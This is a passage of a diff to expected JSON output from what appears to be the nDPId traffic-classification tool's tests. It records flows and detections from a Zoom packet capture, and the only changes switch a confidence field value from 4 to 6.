00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569520469242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469242,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIKAsAAEARx2\/AqAF1ov8mDl1fDZYANPpTAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569520469253,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469253,"pkt":"EBMx8Tl2KDc3AG3ICABFAABI+hMAAEAR9WbAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469253,"flow_last_seen":1569520469253,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1569520469253,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569520469264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469264,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIADMAAEAR70fAqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569520469274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1569520469274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIzF0AAEARIx3AqAF1ov8mDl1fDZcANPpSAAEAGMFdrmNYXRQ5LlgsJgQDvzABAQAUMTIzNDU2Nzg5MDEyMzQ1Njc4OQA="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469340,"flow_last_seen":1569520469340,"flow_idle_time":7580000,"flow_min_l4_payload_len":263,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":263,"midstream":1,"thread_ts_msec":1569520469340,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -69,145 +69,145 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":1368,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1368,"flow_avg_l4_payload_len":1368,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAWMAABAAEAGb1\/AqAF1I7rgNdJwAbu\/4X6L2uaJRIAQEAC3VgAAAQEICiWc2ySFp5bjFwMDBZ4AAAAAAAAAkgusoLvJ6vSttM3Q7UxWnNoYus44vvH4fsNNbl6rpvk6OYpGeuvwflaMmUGTYIrirttSlsO38H0GA7wE0xtelFBUIqtPaG2zLaELN02TEy8tUFQrsrqVaYUsCYJ2hIqsiRr8HUVz8JaKDjyEbW\/6SDuFmHrK8XtHElqv0awJOAEmL3KNt0jVBWwHCGEFsZPcfO1pHuuoiBuup3wZUBRnIJST+dFPme0TV6vJ+IxOjx\/mA8fFWqQdV0lKttFkpnySiRxX5yrxpipVJy4p7z67+kAmdWhmjAbJ0jKiyDw+DcyTkynUokZHprab8MCYp\/TQx3xlQiW8+bdGrifHDAXawAfxdyEnxRfDIbdQKLwqUd3q\/7pZfr\/4d1tUDgm0WlajX7mPfF9WlQlsZCy+ChrMLq6KB65LC24miZN0Oh\/kWW3n1lqgTdT6wyEHUQbhN7aMRFDURjgWnZBDWn4PrH7p5zNvQSTu1\/tX7DHH9FI+E\/S8F73db4ge7KXn\/dETNp0MT++lGzZNvQ8tP2HIXFPFo1PFoNApoahzcRPgbV1rmTnmuWdwR6k9v2rQ51IRkvomJ5+TW8zK\/T3dpZj8bQ2ZXFOOqjyv1+mdfNtQelTeuF+xFuT9k3w43crUkirHNjO6HDcTH8g5iwOfX\/P5Ze+j2MahTCw4IqO2cgO0GUqqgaRqFgkBd4qtJfEyTzJvn2QyDNF8nXiqgRtiC89ltDf6sKzt1TUcglqiIso29y4WBLLmAnOlHxC5COmZYEu0CraDE3vjq3Eo6QVYa5U+p4OKJ9K9r563eLKRSjLRb\/GJwoU19nJfa5zVERWEq0IToF\/rMA7vLUy3muT3dZmJxkOsSuFN\/Usyd+T412g2p1ZdXXnKqATMbFhbdBtC\/y58N+Ld\/82QR9uhyJTGIl+G7bL56l07dPTLTdZ8Usdj23buwPw30vMgmi+E2m8MN9Y502dlBs94rGej8il7sUNS4pRHgYLTyWg6cZyS8AsHVWXff0sHuCuhPPV8M5EKNXzyntJ0gexz8gHMiqPY4NI0Ni\/OneEqQ4C8E6uqXvI2kcZ2BOG\/p4MX8o3AIWp7ayyFuWOJxi2lw6TEu8NuHHmGI4kv4FI3\/kgSQc6sf3SB44BSo3k4njWMAfAGbStQzO7TdByZBgUmqKdUtWCav3gJeVcsVZvgE+oEb2RNn0kn49ZouFmtBZa4MHnF81Rig78AE6ulpakr3aQ66b3O\/vtpHtpLOQcnjEQ\/qS+\/M1GayjxpQWCXEP02WwpvuLolzsWcvLf0N4iVpkzaVwjd0PnTczMC0nRmMJNbIBUnjIjJ5eKWfHSbRJbj\/MtVxqJwc8zwost2cccITh0lHc81zUSBD7GSF5b9zV7g2B0N4HfRanVjZhq4\/wraioSAC+795Umn4JCnMPSUAwuEnGuY7\/qhVrVORRO8KqXtC5\/5m+ff6XLy24O2WsPRzzPmP37Tt6opYkQlNaCU6f6MSh5leucVqZunkohryKjXGP2HU49rKyG4sSngfKn7U3ByAtKcO8nimiTP81z1QcgS2WUUKeZI5VJBPQ5toQ20MunmnQc+AjUHR7cCT28cN30m+ZL49Jt0RzL1N4yKvfdecf7UAMl9WG3IWewXXS8itIsi3DkAYv6t2MOlXE9XEWXdwxfePqJvzpR\/iHVQx\/6oobZRIQjxTbqoCvtXEg2uj6gJpcxIkn9+KrUGRl5tdROeMX0NbfZvt+g+tOcHvsvl+k5qrsiSB57D9TdRPsfMHD4AQRHjKQWksr1jHIvNkgNXnSPAu9+rrqEJ8piMP7LlZAKGZwhC"} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":141,"pkt_l4_len":107,"thread_ts_msec":1569520469341,"pkt":"EBMx8Tl2KDc3AG3ICABFAAB\/AABAAEAGdGzAqAF1I7rgNdJwAbu\/4YPj2uaJRIAYEACuSgAAAQEICiWc2ySFp5bjD8rJVgENkhz7SGo+3tsT+62YMYedQzLcJKiig4pAH+hO24ZoiQ1LNK0ZidRBnPFEPrr+zH4y+BGqQ1wCDA9XJFEjegtqGmZzuBXv"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1443,"flow_avg_l4_payload_len":721,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469341,"flow_last_seen":1569520469341,"flow_idle_time":7580000,"flow_min_l4_payload_len":75,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1443,"flow_avg_l4_payload_len":721,"midstream":1,"thread_ts_msec":1569520469341,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"35.186.224.53","src_port":53872,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"zoom.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1569520469354,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469354,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA07H8AAHcGkTcjuuA1wKgBdQG70nDa5olEv+GD44AQA\/fBegAAAQEICoWn6LklnNsk"} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569520469370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1569520469370,"pkt":"KDc3AG3IEBMx8Tl2CABFAABrxSVAADUGFFlox0EqwKgBdQBQ0mtWiVxBp7jrIIAYACoMGQAAAQEICrPWHtMlnNsjzR67t55lmahUyt3+F7wIZY40kmp5z0B6VTx\/VJbCVWp7syOQaUpp1Ik5I7MknMnzBR1VLfTDBg=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569520469370,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520469370,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGzrXAqAF1aMdBKtJrAFCnuOsgVolceIAQD\/4OlAAAAQEICiWc2z+z1h7T"} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569520469423,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469423,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4WycAAEABlHPAqAF1ov8mDgMDkd4AAAAARQAAPMGVQAAuEf\/wov8mDsCoAXUNl11fACgAAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} +00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469423,"flow_last_seen":1569520469423,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569520469423,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":4.182005} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"zoom.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569520469433,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569520469433,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA4ZPoAAEABiqDAqAF1ov8mDgMDkd4AAAAARQAAPMGZQAAuEf\/sov8mDsCoAXUNl11fACgAAA=="} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520469782} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":90,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520469435,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569520469797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1569520469797,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzBkxAAEARcsXAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABIog9sAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} -00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} +00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"zoom.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469797,"flow_last_seen":1569520469797,"flow_idle_time":200000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1569520469797,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469950,"flow_last_seen":1569520469950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520469950,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569520469950,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520469950,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBQ3AqAF1NMo+xNZRAbvXiDKIAAAAALAC\/\/8cGAAAAgQFtAEDAwUBAQgKJZzdfwAAAAAEAgAA"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1569520469984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1569520469984,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6vIgAAP8Re2PAqAF1wKgBAfYMADUAJtTToX0BAAABAAAAAAAABHd3dzMEem9vbQJ1cwAAAQAB"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520469984,"flow_last_seen":1569520469984,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1569520469984,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1569520470021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1569520470021,"pkt":"KDc3AG3IEBMx8Tl2CABFAABKWCQAADcRp7jAqAEBwKgBdQA19gwANiAtoX2BgAABAAEAAAAABHd3dzMEem9vbQJ1cwAAAQABwAwAAQABAAAAPAAENMo+7A=="} -00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} +00778{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"zoom.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469984,"flow_last_seen":1569520470021,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520470021,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62988,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"www3.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.236"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520470022,"flow_last_seen":1569520470022,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520470022,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1569520470022,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520470022,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGBOXAqAF1NMo+7NZSAbv67hZtAAAAALAC\/\/8UXQAAAgQFtAEDAwUBAQgKJZzdxgAAAAAEAgAA"} 